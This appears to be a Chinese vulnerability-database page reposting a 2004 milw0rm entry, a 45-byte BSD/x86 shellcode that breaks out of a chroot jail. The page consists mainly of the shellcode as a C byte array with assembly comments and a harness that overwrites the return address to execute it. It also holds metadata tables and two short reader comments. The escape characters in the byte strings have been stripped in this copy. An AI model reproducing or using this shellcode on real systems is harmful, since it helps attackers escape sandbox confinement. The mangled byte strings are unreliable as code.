BSD/x86 – Break chroot Shellcode (45 bytes)
| 漏洞ID | 1054686 | 漏洞类型 | |
| 发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
![图片[1]-BSD/x86 – Break chroot Shellcode (45 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-BSD/x86 – Break chroot Shellcode (45 bytes)-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | BSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
*BSD version
FreeBSD, OpenBSD, NetBSD.
[email protected]
45 bytes.
-break chrooted
*/
char shellcode[]=
"x68x62x2ex2ex2e" /* pushl $0x2e2e2e62 */
"x89xe7" /* movl %esp,%edi */
"x33xc0" /* xorl %eax,%eax */
"x88x47x03" /* movb %al,0x3(%edi) */
"x57" /* pushl %edi */
"xb0x88" /* movb $0x88,%al */
"x50" /* pushl %eax */
"xcdx80" /* int $0x80 */
"x57" /* pushl %edi */
"xb0x3d" /* movb $0x3d,%al */
"x50" /* pushl %eax */
"xcdx80" /* int $0x80 */
"x47" /* incl %edi */
"x33xc9" /* xorl %ecx,%ecx */
"xb1xff" /* movb $0xff,%cl */
"x57" /* pushl %edi */
"x50" /* pushl %eax */
"xb0x0c" /* movb $0x0c,%al */
"xcdx80" /* int $0x80 */
"xe2xfa" /* loop <shellcode +31> */
"x47" /* incl %edi */
"x57" /* pushl %edi */
"xb0x3d" /* movb $0x3d,%al */
"x50" /* pushl %eax */
"xcdx80"; /* int $0x80 */
main()
{
int *ret;
printf("Shellcode lenght=%dn",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
// milw0rm.com [2004-09-26]相关推荐: Computer Associates InoculateIT Symbolic Link File Overwriting Vulnerability
Computer Associates InoculateIT Symbolic Link File Overwriting Vulnerability 漏洞ID 1103182 漏洞类型 Access Validation Error 发布时间 2001-0…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666